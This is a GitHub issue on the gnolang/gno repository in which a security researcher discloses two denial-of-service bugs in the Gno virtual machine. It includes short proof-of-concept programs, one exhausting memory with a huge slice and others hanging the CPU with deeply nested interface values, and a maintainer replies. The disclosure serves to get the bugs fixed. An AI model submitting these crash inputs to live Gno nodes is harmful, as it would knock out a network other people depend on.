search

gnolang / gno

Gno: An interpreted, stack-based Go virtual machine to build succinct and composable apps + Gno.land: a blockchain for timeless code and fair open-source.
https://gno.land/
Other
885 stars 367 forks source link

Two critical VM issues (denial of service attacks) #2738

Open bbarwik opened 1 month ago

bbarwik commented 1 month ago

Two critical VM issues (denial of service attacks)

Hey everyone, I am a Web3 cybersecurity researcher working for Hacken specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.

Critical issues

  1. Crashing VM due to out-of-memory error by allocating a huge slice:

    package main
func main() {
buffer := make([]int, 1_000_000_000_000)
buffer[1] = 1
}

  2. Crashing VM by creating very deep structure which is very CPU-intensive to process:

    func init() {
var x interface{}    
for {
    x = [1]interface{}{x}    
}
}

or alternatively:

package main
func main() {
    var x interface{}    
    for i := 0; i < 10000; i++ {
        x = [1]interface{}{x}    
    }
    for i := 0; i < 10000; i++ {
        println(x)   
    }
}

I used the following test to reproduce these issues: crash_test.go.zip. You should put it in gno.land/pkg/sdk/vm and run it there with go test -v -run TestVMCrash.

Next steps

I highly recommend introducing Fuzzing in your project and undergoing a full audit before launching your product.

Feel free to contact me here or by sending an email to b.barwikowski@hacken.io if you need any help.

deelawn commented 4 weeks ago

I'll take a stab at solving the first issue listed here

  1. Crashing VM due to out-of-memory error by allocating a huge slice: